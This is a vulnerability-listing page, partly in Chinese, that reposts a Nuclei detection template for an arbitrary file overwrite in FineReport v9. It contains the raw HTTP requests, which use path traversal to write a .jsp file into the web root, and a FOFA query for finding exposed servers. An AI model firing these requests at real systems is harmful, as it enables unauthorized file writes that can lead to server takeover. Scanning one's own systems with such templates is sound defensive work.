fine-report-v9-file-upload: FineReport v9 Arbitrary File Overwrite

日期: 2025-08-01 | 影响软件: FineReport v9 | POC: 已公开

漏洞描述

FineReport ( A business intelligence (BI) and reporting software ) is vulnerable to Arbitrary File Overwrite.

PoC代码[已公开]

id: fine-report-v9-file-upload

info:
  name: FineReport v9 Arbitrary File Overwrite
  author: SleepingBag945
  severity: critical
  description: FineReport ( A business intelligence (BI) and reporting software ) is vulnerable to Arbitrary File Overwrite.
  reference:
    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
  metadata:
    max-request: 2
    fofa-query: app="帆软-FineReport"
  tags: finereport,fileupload,intrusive,vuln
variables:
  string: '{{rand_base(8, "abc")}}'
  filename: '{{rand_base(8)}}'

http:
  - raw:
      - |
        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
      - |
        GET /WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"
# digest: 4b0a00483046022100857f5f53c4fa8e534bc32adba7d39766671cc1c65312d26494df0bdf8bf10d5502210090ab233fca409b42a11106726138c2fe00b033a99a5fef80189f2242f4ddefef:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐